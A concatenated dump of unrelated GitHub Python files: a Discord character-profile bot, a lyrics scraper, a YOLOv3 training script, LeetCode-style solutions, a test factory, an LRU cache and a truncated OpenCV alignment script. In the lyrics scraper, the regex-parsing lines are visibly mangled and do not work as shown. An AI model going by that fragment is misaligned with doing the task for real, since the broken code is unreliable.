sys.exit(main())\n","repo_name":"dawsonbooth/treefrog","sub_path":"treefrog/rename/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41933736054","text":"import discord\nimport traceback\nimport time\n\nfrom .lt_logger import lt_logger\nfrom discord import app_commands\nfrom discord.ext import commands\n\n\nclass char(commands.GroupCog, group_name=\"char\"):\n def __init__(self, bot, lt_db, channel):\n self.bot = bot\n self.db = lt_db\n self.logger = lt_logger\n self.channel = channel\n\n def ctx_info(self, ctx):\n return ctx.channel.category.id, ctx.guild.id, ctx.message.author.id\n\n async def paginate_embeds(self, Guild, embeds, ownerList):\n # check len(ownerList)\n # if len(ownerList) > 6, iterate through first 6 owners:\n # if len(ownerList) < 6, iterate through all owners:\n\n if len(ownerList) > 6:\n newList = ownerList[:6]\n else:\n newList = ownerList\n embed = discord.Embed(\n description=f\"Character List for {Guild.name}\",\n title=f\"__**Character List by Owner**__\",\n color=0x202020,\n )\n\n for owner in newList:\n characterList = self.db.get_char_by_owner(Guild.id, owner)\n charList = \"\"\n for char in characterList:\n try:\n char[\"name\"]\n charList += f\"{char['name']}\\n\"\n except:\n continue\n\n if charList == \"\":\n continue\n\n try:\n owner_name = await Guild.fetch_member(owner)\n owner_name = owner_name.display_name\n embed.add_field(name=f\"{owner_name}\", value=charList.title())\n except:\n owner_name = await self.bot.fetch_user(owner)\n owner_name = owner_name.name\n embed.add_field(\n name=f\"{owner_name}\",\n value=\"**__[USER NO LONGER IN SERVER]__**\\n\\n\" + charList.title(),\n )\n\n embeds.append(embed)\n del ownerList[:6]\n if len(ownerList) > 0:\n await self.paginate_embeds(Guild, embeds, ownerList)\n\n @commands.group(case_insensitive=True)\n async def char(self, ctx):\n \"\"\"\n Use to display a character's profile, if one exists. All characters are saved on a per-guild basis.\n\n Can also be used to list a user's characters, either your own by using .char without a name, or someone else's by using .char @user.\n \"\"\"\n\n if ctx.invoked_subcommand is None:\n try:\n try:\n ctx.message.mentions[0]\n await self.display(ctx)\n\n except:\n\n if ctx.message.content.lower() == \".char\":\n await self.display(ctx)\n else:\n Name = ctx.message.content.lstrip(\" \")\n await self.display(ctx, Name)\n\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"Character Profile\",\n ctx.message.author,\n )\n\n @char.command()\n async def chown(self, ctx, Name):\n Name = Name.lower()\n _, Guild, ID = self.ctx_info(ctx)\n ownerCheck = \"\"\n try:\n ownerCheck = self.db.char_owner(Guild, ID, Name)\n except:\n pass\n # await ctx.send(f\"I don't think {Name.title()} belongs to you!\")\n try:\n newOwner = ctx.message.mentions[0]\n except:\n return await ctx.send(\n \"You must @ a user in order to designate a new owner.\"\n )\n\n if ownerCheck == True:\n output = self.db.change_owner(Guild, Name, newOwner.id)\n else:\n output = f\"I don't think you own {Name.title()}. Make sure you're trying to change ownership of the correct character profile!\"\n\n await ctx.send(output)\n\n @char.command()\n async def add(self, ctx, *, Name):\n \"\"\"\n Register a user's character.\n \"\"\"\n try:\n _, Guild, _ = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n\n Guild = self.db.get_server_proxy(ID)\n\n try:\n ID = ctx.message.mentions[0].id\n except:\n ID = ctx.message.author.id\n\n Name = Name.lower()\n\n output = self.db.add_char(Guild, ID, Name)\n await ctx.send(output)\n\n @char.command()\n async def remove(self, ctx, *, Name):\n \"\"\"\n Remove a user's character from the guild.\n \"\"\"\n try:\n _, Guild, ID = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n Guild = self.db.get_server_proxy(ID)\n\n Name = Name.lower()\n\n ownerCheck = \"\"\n try:\n ownerCheck = self.db.char_owner(Guild, ID, Name)\n except:\n pass\n if ownerCheck == True:\n output = self.db.remove_char(Guild, ID, Name)\n await ctx.send(output)\n else:\n await ctx.send(f\"{Name.title()} doesn't belong to you, or doesn't exist.\")\n\n @char.command(aliases=[\"set\"])\n async def addfield(self, ctx, Name, field: str, *, value):\n \"\"\"\n Add a field to a character, or update a field to a new value.\n \"\"\"\n Name = Name.lower()\n try:\n _, Guild, ID = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n Guild = self.db.get_server_proxy(ID)\n\n ownerCheck = \"\"\n\n try:\n ownerCheck = self.db.char_owner(Guild, ID, Name)\n except:\n await ctx.send(f\"I don't think {Name.title()} belongs to you!\")\n if ownerCheck == True:\n\n if field == \"color\":\n\n self.db.set_field(Guild, ID, Name, field, value)\n await ctx.send(f\"{Name.title()}'s {field} value has been updated!\")\n elif field in {\"owner\", \"category\", \"public\", \"name\"}:\n await ctx.send(\n f\"This value, {field.capitalize()}, is used for behind-the-scenes things, and cannot be modified. Sorry for the inconvenience!\"\n )\n else:\n self.db.set_field(Guild, ID, Name, field, value)\n await ctx.send(f\"{Name.title()}'s {field} value has been updated!\")\n\n @char.command(aliases=[\"unset\"])\n async def removefield(self, ctx, Name, field):\n \"\"\"\n Remove a field from a character.\n \"\"\"\n Name = Name.lower()\n\n try:\n _, Guild, ID = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n Guild = self.db.get_server_proxy(ID)\n\n ownerCheck = \"\"\n\n try:\n ownerCheck = self.db.char_owner(Guild, ID, Name)\n except:\n pass\n try:\n if ownerCheck == True:\n if field == \"owner\" or field == \"name\":\n await ctx.send(\"Sorry, I can't let you do that.\")\n else:\n self.db.unset_field(Guild, ID, Name, field)\n await ctx.send(f\"{field} has been removed from {Name.title()}!\")\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"Remove Field\",\n ctx.message.author,\n )\n\n @char.command(hidden=True)\n async def display(self, ctx, Name=None):\n \"\"\"\n Display information regarding a stored character, including all stored fields.\n \"\"\"\n\n def check(reaction, user):\n return reaction.message.id == msg.id and user == ctx.author\n\n async def reaction_reset(reaction, user):\n if reaction.message.id == msg.id and user == ctx.author:\n await msg.remove_reaction(reaction, user)\n\n try:\n _, Guild, ID = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n Guild = self.db.get_server_proxy(ID)\n\n try:\n user = ctx.message.mentions[0].id\n results = self.db.get_char_by_owner(Guild, user)\n except:\n if Name == None:\n try:\n user = ctx.message.author.id\n results = self.db.get_char_by_owner(Guild, user)\n\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"char\",\n ctx.message.author,\n )\n else:\n Name = Name.lower()\n results = self.db.get_char(Guild, Name)\n\n Guild = self.bot.get_guild(Guild)\n embeds = []\n for output in results:\n\n try:\n output[\"name\"]\n except:\n continue\n try:\n if output[\"description\"] != \"\":\n description = output[\"description\"]\n else:\n description = \" \"\n except:\n description = \" \"\n embed = discord.Embed(\n title=\"__\" + output[\"name\"].title() + \"__\",\n description=description,\n color=int(str(output[\"color\"]), 16),\n )\n\n try:\n\n embed.set_footer(\n text=f\"Owned by: { await Guild.fetch_member(int(output['owner']))}\"\n )\n except:\n embed.set_footer(\n text=f\"Owned by: { await self.bot.fetch_user(output['owner'])} : USER NO LONGER IN SERVER\"\n )\n\n del (\n output[\"_id\"],\n output[\"owner\"],\n output[\"name\"],\n output[\"color\"],\n output[\"public\"],\n )\n keys = []\n vals = []\n\n for i in output.items():\n keys.append(i[0]), vals.append(i[1])\n\n for i in range(len(output)):\n if keys[i].lower() == \"image\":\n embed.set_image(url=vals[i])\n elif keys[i].lower() == \"token\":\n embed.set_thumbnail(url=vals[i])\n\n elif keys[i].lower() == \"description\":\n pass\n\n else:\n embed.add_field(name=str(keys[i]), value=str(vals[i]))\n\n try:\n if embed:\n embeds.append(embed)\n else:\n await ctx.send(f\"It looks like {Name} doesn't exist!\")\n except:\n message = str(traceback.format_exc())\n self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"Display\",\n ctx.message.author,\n )\n\n if len(embeds) == 1:\n msg = await ctx.send(embed=embeds[0])\n\n await msg.add_reaction(\"❌\")\n timeout = time.time() + 3600\n\n while True:\n if time.time() > timeout:\n await msg.clear_reactions()\n break\n try:\n reaction, _ = await self.bot.wait_for(\n \"reaction_add\", timeout=3600.0, check=check\n )\n if reaction.emoji == \"❌\":\n await msg.delete()\n break\n else:\n await reaction_reset(reaction, user)\n except:\n pass\n\n else:\n page = 0\n\n msg = await ctx.send(embed=embeds[page])\n\n await msg.add_reaction(\"⏪\")\n await msg.add_reaction(\"⬅️\")\n await msg.add_reaction(\"🟥\")\n await msg.add_reaction(\"➡️\")\n await msg.add_reaction(\"⏩\")\n await msg.add_reaction(\"❌\")\n timeout = time.time() + 3600\n\n while True:\n if time.time() > timeout:\n await msg.clear_reactions()\n break\n try:\n reaction, _ = await self.bot.wait_for(\n \"reaction_add\", timeout=3600.0, check=check\n )\n if reaction.emoji == \"⬅️\" and page > 0:\n page -= 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"➡️\" and page < len(embeds) - 1:\n page += 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"⏪\" and page > 0:\n page = 0\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"⏩\" and page < len(embeds) - 1:\n page = len(embeds) - 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"🟥\":\n await msg.clear_reactions()\n break\n elif reaction.emoji == \"❌\":\n await msg.delete()\n break\n else:\n await reaction_reset(reaction, ctx.author)\n except:\n pass\n\n @char.command()\n async def webedit(self, ctx):\n \"\"\"\n Sends a link to the Little Thunder Web Editor.\n \"\"\"\n await ctx.send(\n \"The LT Web Editor can be found at https://webthunder.herokuapp.com/\"\n )\n\n @char.command()\n async def directory(self, ctx, detailLevel=\"Default\"):\n try:\n try:\n _, Guild, user = self.ctx_info(ctx)\n Guild = self.bot.get_guild(Guild)\n except:\n user = ctx.author.id\n Guild = await self.bot.fetch_guild(int(self.db.get_server_proxy(user)))\n\n # members = await Guild.fetch_members(limit=None).flatten()\n embeds = []\n\n def check(reaction, user):\n return reaction.message.id == msg.id and user == ctx.author\n\n async def reaction_reset(reaction, user):\n if reaction.message.id == msg.id and user == ctx.author:\n await msg.remove_reaction(reaction, user)\n\n async with ctx.typing():\n characters = list(self.db.get_all_char(Guild.id))\n characters = sorted(characters, key=lambda i: i[\"owner\"])\n\n owners = [character[\"owner\"] for character in characters]\n ownerList = []\n for owner in owners:\n if owner not in ownerList:\n ownerList.append(owner)\n\n if detailLevel.lower() == \"verbose\":\n for character in characters:\n\n try:\n character[\"name\"]\n except:\n continue\n try:\n if character[\"description\"] != \"\":\n description = character[\"description\"]\n else:\n description = \" \"\n except:\n description = \" \"\n embed = discord.Embed(\n title=\"__\" + character[\"name\"].title() + \"__\",\n description=description,\n color=int(str(character[\"color\"]), 16),\n )\n try:\n embed.set_footer(\n text=f\"Owned by: { await Guild.fetch_member(character['owner'])}\"\n )\n\n except:\n embed.set_footer(\n text=f\"Owned by: { await self.bot.fetch_user(character['owner'])} : USER NO LONGER IN SERVER\"\n )\n\n del (\n character[\"_id\"],\n character[\"owner\"],\n character[\"name\"],\n character[\"color\"],\n character[\"public\"],\n )\n keys = []\n vals = []\n\n for i in character.items():\n keys.append(i[0]), vals.append(i[1])\n\n for i in range(len(character)):\n if keys[i] == \"image\":\n embed.set_image(url=vals[i])\n elif keys[i] == \"token\":\n embed.set_thumbnail(url=vals[i])\n\n elif keys[i] == \"description\":\n pass\n\n else:\n embed.add_field(name=str(keys[i]), value=str(vals[i]))\n\n try:\n if embed:\n embeds.append(embed)\n else:\n pass\n except:\n message = str(traceback.format_exc())\n self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"Display\",\n ctx.message.author,\n )\n elif detailLevel.lower() == \"expanded\":\n new_embeds = await self.paginate_embeds(Guild, embeds, ownerList)\n\n else:\n\n for owner in ownerList:\n characterList = self.db.get_char_by_owner(Guild.id, owner)\n\n charList = \"\"\n for character in characterList:\n\n try:\n character[\"name\"]\n\n except:\n continue\n\n charList += str(character[\"name\"]).title() + \"\\n\"\n\n if charList != \"\":\n try:\n member = await Guild.fetch_member(owner)\n embed = discord.Embed(\n description=charList,\n title=member.display_name,\n color=member.color,\n )\n embed.set_thumbnail(url=member.avatar_url)\n embeds.append(embed)\n except:\n member = await self.bot.fetch_user(owner)\n embed = discord.Embed(\n description=charList,\n title=member.name,\n )\n embed.set_thumbnail(url=member.avatar_url)\n embed.set_footer(\n text=\"User may no longer be in this server.\"\n )\n embeds.append(embed)\n\n if len(embeds) == 1:\n msg = await ctx.send(embed=embeds[0])\n\n await msg.add_reaction(\"❌\")\n\n timeout = time.time() + 3600\n\n while True:\n if time.time() > timeout:\n await msg.clear_reactions()\n break\n try:\n reaction, _ = await self.bot.wait_for(\n \"reaction_add\", timeout=3600.0, check=check\n )\n if reaction.emoji == \"❌\":\n await msg.delete()\n break\n else:\n await reaction_reset(reaction, user)\n except:\n pass\n\n else:\n page = 0\n\n msg = await ctx.send(embed=embeds[page])\n\n await msg.add_reaction(\"⏪\")\n await msg.add_reaction(\"⬅️\")\n await msg.add_reaction(\"🟥\")\n await msg.add_reaction(\"➡️\")\n await msg.add_reaction(\"⏩\")\n await msg.add_reaction(\"❌\")\n timeout = time.time() + 3600\n\n while True:\n if time.time() > timeout:\n await msg.clear_reactions()\n break\n try:\n reaction, _ = await self.bot.wait_for(\n \"reaction_add\", timeout=3600.0, check=check\n )\n if reaction.emoji == \"⬅️\" and page > 0:\n page -= 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"➡️\" and page < len(embeds) - 1:\n page += 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"⏪\" and page > 0:\n page = 0\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"⏩\" and page < len(embeds) - 1:\n page = len(embeds) - 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"🟥\":\n await msg.clear_reactions()\n break\n elif reaction.emoji == \"❌\":\n await msg.delete()\n break\n else:\n await reaction_reset(reaction, ctx.author)\n except:\n pass\n\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"Macro\", ctx.message.author\n )\n\n\ndef setup(bot):\n bot.add_cog(char(bot))\n","repo_name":"CaydenCailean/littlethunder","sub_path":"cogs/char.py","file_name":"char.py","file_ext":"py","file_size_in_byte":23130,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37654432866","text":"#-*- coding: UTF-8 -*-\n'''\nScraper for https://www.lyricsify.com/\n'''\n\nimport requests\nimport re\nimport difflib\nfrom bs4 import BeautifulSoup\nfrom lib.utils import *\n\n__title__ = \"Lyricsify\"\n__priority__ = '130'\n__lrc__ = True\n\nUserAgent = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\"}\n\n\nclass LyricsFetcher:\n def __init__(self, *args, **kwargs):\n self.DEBUG = kwargs['debug']\n self.settings = kwargs['settings']\n self.SEARCH_URL = 'https://www.lyricsify.com/lyrics/%s/%s'\n self.LYRIC_URL = 'https://www.lyricsify.com%s'\n\n def get_lyrics(self, song):\n log(\"%s: searching lyrics for %s - %s\" % (__title__, song.artist, song.title), debug=self.DEBUG)\n lyrics = Lyrics(settings=self.settings)\n lyrics.song = song\n lyrics.source = __title__\n lyrics.lrc = __lrc__\n artist = song.artist.replace(' ', '-')\n title = song.title.replace(' ', '-')\n try:\n url = self.SEARCH_URL % (artist, title)\n search = requests.get(url, headers=UserAgent, timeout=10)\n response = search.text\n except:\n return None\n links = []\n soup = BeautifulSoup(response, 'html.parser')\n for link in soup.find_all('a'):\n if link.string and link.get('href').startswith('/lrc/'):\n foundartist = link.string.split(' - ', 1)[0]\n # some links don't have a proper 'artist - title' format\n try:\n foundsong = link.string.split(' - ', 1)[1].rstrip('.lrc')\n except:\n continue\n if (difflib.SequenceMatcher(None, artist.lower(), foundartist.lower()).ratio() > 0.8) and (difflib.SequenceMatcher(None, title.lower(), foundsong.lower()).ratio() > 0.8):\n links.append((foundartist + ' - ' + foundsong, self.LYRIC_URL % link.get('href'), foundartist, foundsong))\n if len(links) == 0:\n return None\n elif len(links) > 1:\n lyrics.list = links\n for link in links:\n lyr = self.get_lyrics_from_list(link)\n if lyr:\n lyrics.lyrics = lyr\n return lyrics\n return None\n\n def get_lyrics_from_list(self, link):\n title,url,artist,song = link\n try:\n log('%s: search url: %s' % (__title__, url), debug=self.DEBUG)\n search = requests.get(url, headers=UserAgent, timeout=10)\n response = search.text\n except:\n return None\n matchcode = re.search('/h3>(.*?)', '', lyricscode)\n return cleanlyrics\n","repo_name":"nebulous42069/diggz","sub_path":"nexus/script.cu.lrclyrics/lib/culrcscrapers/lyricsify/lyricsScraper.py","file_name":"lyricsScraper.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42953125003","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport tensorflow as tf\ngpus = tf.config.experimental.list_physical_devices(device_type='GPU')\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\nimport numpy as np\nimport cv2\nfrom model.models import Darknet_body, DarknetTiny_body\nfrom model.loss import YoLoLoss\nfrom model.load_xml_data import load_data, preprocess_true_boxes\nimport os\n\n\n# In[2]:\n\ndef main():\n #input shape要為32的倍數,因為5次downsampling\n input_shape = (416, 416)\n annotation_path = 'annotation path'\n log_dir = 'save model path'\n classes_path = 'classes path'\n anchors_path = 'anchors path'\n class_name = get_classes(classes_path)\n #class數量\n num_classes = len(class_name)\n anchors = get_anchors(anchors_path) / input_shape[::-1]\n num_anchors = len(anchors)\n is_tiny_version = True\n batch_size = 40\n\n #creat model\n if is_tiny_version:\n model = DarknetTiny_body(input_shape, num_anchors, num_classes)\n anchor_mask = [[3,4,5], [0,1,2]]\n \n else:\n model = Darknet_body(input_shape, num_anchors, num_classes)\n anchor_mask = [[6,7,8], [3,4,5], [0,1,2]]\n \n model.summary()\n \n xmls = os.listdir(annotation_path)\n total_train = len(xmls)\n \n print('train data:', total_train)\n print('anchors:', anchors)\n \n callbacks = [tf.keras.callbacks.ModelCheckpoint(filepath= log_dir + '/best_loss.h5',\n save_best_only=True,\n save_weights_only=True,\n monitor='loss',\n verbose=1)]\n \n loss = [YoLoLoss(input_shape, anchors[mask], classes=num_classes) for mask in anchor_mask]\n \n opt = tf.keras.optimizers.Adam()\n model.compile(optimizer=opt, loss=loss)\n \n model.fit(img_generator(xmls, annotation_path, batch_size, input_shape, anchors, anchor_mask, num_classes, is_tiny_version),\n steps_per_epoch = total_train//batch_size, callbacks=callbacks, epochs=200)\n\n model.save_weights(log_dir + '/finall.h5')\n\n#讀取類別,回傳類別List\ndef get_classes(classes_path):\n with open(classes_path) as f:\n class_name = f.readlines()\n class_name = [c.strip() for c in class_name]\n return class_name\n\n#讀取anchors\ndef get_anchors(anchors_path):\n with open(anchors_path) as f:\n anchors = f.readline()\n #str to float\n anchors = [float(x) for x in anchors.split(',')]\n #回傳[[w1,h1],....,[wn,hn]]形式\n return np.array(anchors).reshape(-1,2)\n\ndef img_generator(xml_name, ann_path, batch_size, input_shape, anchors, anchor_mask, num_classes, is_tiny_version):\n n = len(xml_name)\n i = 0\n while True:\n image_data = []\n box_data = []\n for r in range(batch_size):\n if i==0:\n np.random.shuffle(xml_name)\n image, box = load_data(ann_path + xml_name[i])\n image_data.append(image)\n box_data.append(box)\n i = (i+1) % n\n\n image_data = (np.array(image_data) / 255).astype(np.float32)\n box_data = np.array(box_data)\n y_true = preprocess_true_boxes(box_data, input_shape, anchors, anchor_mask, num_classes, tiny=is_tiny_version)\n \n yield (image_data, y_true)\n\n\n# In[6]:\n\nmain()\n\n\n\n","repo_name":"qwerasdf887/TF2_YOLOv3","sub_path":"train_on_xml.py","file_name":"train_on_xml.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"38214993969","text":"class Solution:\n def jump(self, nums: List[int]) -> int:\n jump_count = 0\n farest = 0\n current_idx = 0\n for i in range(len(nums)-1):\n farest = max(farest, i+nums[i])\n if i == current_idx:\n jump_count += 1\n current_idx = farest\n return jump_count\n\n\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n n = len(nums)\n dp = [float(\"inf\")]*n\n dp[0] = 0\n for i in range(n):\n print(\"-----\", dp, i)\n for k in range(i+1, nums[i]+i+1):\n if k >= n:\n break\n dp[k] = min(dp[k], dp[i]+1)\n print(\"=====\", dp, k)\n return dp[n-1]\n","repo_name":"Chestermozhao/Notes","sub_path":"algorithms_practice/45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2793453117","text":"\"\"\"\n불량사용자 - DFS활용문제\n\n\"\"\"\ndef compare(char1, char2):\n # 길이 비교\n if len(char1) == len(char2):\n for k in range(len(char1)):\n # 문자 비교\n if not (char1[k] == char2[k] or char1[k] == \"*\" or char2[k] == \"*\"):\n return False\n else:\n return False\n return True\n\ndef DFS(depth):\n if depth == len(arr):\n res.append(\"\".join(sorted(tmp)))\n else:\n for num in arr[depth]:\n if num not in tmp:\n tmp.append(num)\n DFS(depth+1)\n tmp.pop()\n\ndef solution(user_id, banned_id):\n global answer, arr, tmp, res\n answer = 0\n tmp, res = [], []\n arr = [[] for _ in range(len(banned_id))]\n\n # 2중 for문으로 user_id와 banned_id를 비교함\n for i in range(len(user_id)):\n for j in range(len(banned_id)):\n char1, char2 = user_id[i], banned_id[j]\n if compare(char1, char2):\n # arr의 j는 banned_id의 idx를 의미함\n # arr[j]의 내부값은 user_id의 idx 의미함\n arr[j].append(str(i))\n\n DFS(0)\n print(res)\n return len(set(res))\n\n\nuser_id = [\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"]\nbanned_id = [\"fr*d*\", \"*rodo\", \"******\", \"******\"]\nsolution(user_id, banned_id)","repo_name":"silverjjj/algorithm","sub_path":"Programmers/불량사용.py","file_name":"불량사용.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14647395480","text":"\"\"\"Test Parameters.\"\"\"\nfrom collections import namedtuple\n\nimport factory # type: ignore\n\n\nParameter = namedtuple(\"Parameter\", [\"name\", \"description\", \"type\", \"value\"])\n\napplication_environments = [\"dev\", \"dev2\", \"dev3\"]\napplication_names = [\"cloud-app\", \"another-app\"]\nvalue_types = [\"String\", \"SecureString\"]\n\n\nclass ParameterFactory(factory.Factory): # type: ignore\n \"\"\"Factory creating parameters.\"\"\"\n\n class Meta:\n \"\"\"Extra information for creation of parameters.\"\"\"\n\n model = Parameter\n exclude = (\n \"environment_name\",\n \"application_name\",\n \"application_setting\",\n \"test_value\",\n \"faker\",\n )\n\n environment_name = factory.Faker(\"word\", ext_word_list=application_environments)\n application_name = factory.Faker(\"word\", ext_word_list=application_names)\n application_setting = factory.Faker(\"word\")\n name = factory.LazyAttribute(\n lambda n: \"/environments/%s/%s/%s\"\n % (n.environment_name, n.application_name, n.application_setting)\n )\n description = factory.Faker(\"text\", max_nb_chars=60)\n type = factory.Faker(\"word\", ext_word_list=value_types)\n value = factory.Faker(\"pystr\")\n","repo_name":"nilsdebruin/pydantic-cloud-configuration","sub_path":"tests/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22437299170","text":"# Integer to Roman\r\n\r\n# Given an integer, convert it to a roman numeral.\r\n# Input is guaranteed to be within the range from 1 to 3999.\r\n\r\nclass Solution:\r\n def intToRoman(self, num):\r\n rules = [('I', 'V'), ('X', 'L'), ('C', 'D'), 'M']\r\n result = ''\r\n index = 0\r\n while num > 0:\r\n result = self.getExpression(num % 10, rules[index],\r\n rules[index + 1] if index + 1 < len(rules) else None) + result\r\n num = int(num / 10)\r\n index += 1\r\n return result\r\n\r\n def getExpression(self, digit, rule, next_rule):\r\n if digit <= 3:\r\n return rule[0] * digit\r\n elif digit == 4:\r\n return rule[0] + rule[1]\r\n elif 5 <= digit <= 8:\r\n return rule[1] + rule[0] * (digit - 5)\r\n elif digit == 9:\r\n return rule[0] + next_rule[0]\r\n\r\n\r\nif __name__ == '__main__':\r\n solution = Solution()\r\n for i in range(1, 4000):\r\n print('%d : %s' % (i, solution.intToRoman(i)))\r\n","repo_name":"MadSkittles/leetcode","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4531222711","text":"import requests\n\nurl = \"https://api.extremecloudiq.com/hiq/context\"\n\npayload=\"{\\n \\\"reading_org_ids\\\": [\\n 1\\n ],\\n \\\"creating_org_id\\\": 1\\n}\"\nheaders = {\n 'Authorization': '***',\n 'Content-Type': 'application/json'\n}\n\nresponse = requests.request(\"PUT\", url, headers=headers, data=payload)\n\nprint(response.text)\n","repo_name":"sukhdeepjohar/ExtremeCloudIQ-APIs","sub_path":"XIQ API Python collection/HIQ/Set HIQ context.py","file_name":"Set HIQ context.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"24636775124","text":"#!/bin/env python\n\nimport json\nimport sys\nimport urllib\n\nfrom basicplib.util.timeutil import curr_time_int as current_time\n\n\nSECOND = 1\nMINUTE = 60\nHOUR = 3600\nDAY = 86400\n\n\nclass Node(object):\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.age = current_time()\n self.next = None\n self.prev = None\n self.size = sys.getsizeof(val)\n \n def details(self, include_value=False):\n detail = {\n 'key': self.key,\n 'bust': urllib.urlencode({'key': self.key}),\n 'age': current_time() - self.age\n }\n if include_value:\n detail['val'] = self.val\n return detail\n\n\nclass Cache(object):\n def __init__(self, max_items=100, max_age=-1, max_size=-1, **kwargs):\n self.max_items = max_items\n self.max_age = max_age\n self.max_size = max_size\n self.size = 0\n self.clear()\n self.cache = {}\n self.head = None\n self.tail = None\n\n def clear(self):\n self.cache = {}\n self.head = None\n self.tail = None\n \n def contains(self, key):\n return self.cache.has_key(key)\n \n def details(self, include_values=False):\n keys = []\n current = self.head\n while current:\n keys.append(current.details(include_values))\n current = current.next\n\n return json.dumps({\n 'count': len(self.cache),\n 'size': self.size,\n 'max_size': self.max_size,\n 'max_items': self.max_items,\n 'max_age': self.max_age,\n 'keys': keys\n })\n\n def get(self, key):\n obj = self.cache.get(key)\n if obj:\n if self.max_age < 0 or obj.age + self.max_age >= current_time():\n self.put(key, obj.val)\n return obj.val\n self.remove(key)\n return None\n\n def put(self, key, val):\n if self.contains(key):\n self.remove(key)\n obj = Node(key, val)\n self.size += obj.size\n self.cache[key] = obj\n\n if self.head:\n obj.next = self.head\n self.head.prev = obj\n self.head = obj\n\n if not self.tail:\n self.tail = obj\n\n # check max items constraint\n if self.max_items > 0 and len(self.cache) > self.max_items:\n self.remove(self.tail.key)\n\n # check max_size constraint\n while self.max_size > 0 and self.size > self.max_size:\n self.remove(self.tail.key)\n\n def remove(self, key):\n if self.contains(key):\n obj = self.cache[key]\n if obj.prev:\n obj.prev.next = obj.next\n else:\n self.head = obj.next\n if obj.next:\n obj.next.prev = obj.prev\n else:\n self.tail = obj.prev\n self.size -= obj.size\n del self.cache[key]\n","repo_name":"typd/basicplib","sub_path":"basicplib/util/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12977174483","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 26 19:07:26 2018\r\n\r\n@author: Mikołaj\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport cv2\r\nimport numpy as np\r\nfrom astropy.io import fits\r\nimport time\r\nimport os,re\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import LogNorm\r\nimport math\r\nfrom scipy import ndimage\r\n\r\nMAX_FEATURES = 1000\r\nGOOD_MATCH_PERCENT = 0.15\r\n \r\n \r\ndef alignImages(im1, im2):\r\n \r\n # Convert images to grayscale\r\n #im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\r\n #im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\r\n im1Gray=cv2.cvtColor(im1,cv2.COLOR_GRAY2RGB)\r\n im2Gray=cv2.cvtColor(im2,cv2.COLOR_GRAY2RGB) \r\n # Detect ORB features and compute descriptors.\r\n orb = cv2.ORB_create(MAX_FEATURES)\r\n keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\r\n keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\r\n \r\n # Match features.\r\n matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\r\n matches = matcher.match(descriptors1, descriptors2, None)\r\n \r\n # Sort matches by score\r\n matches.sort(key=lambda x: x.distance, reverse=False)\r\n \r\n # Remove not so good matches\r\n 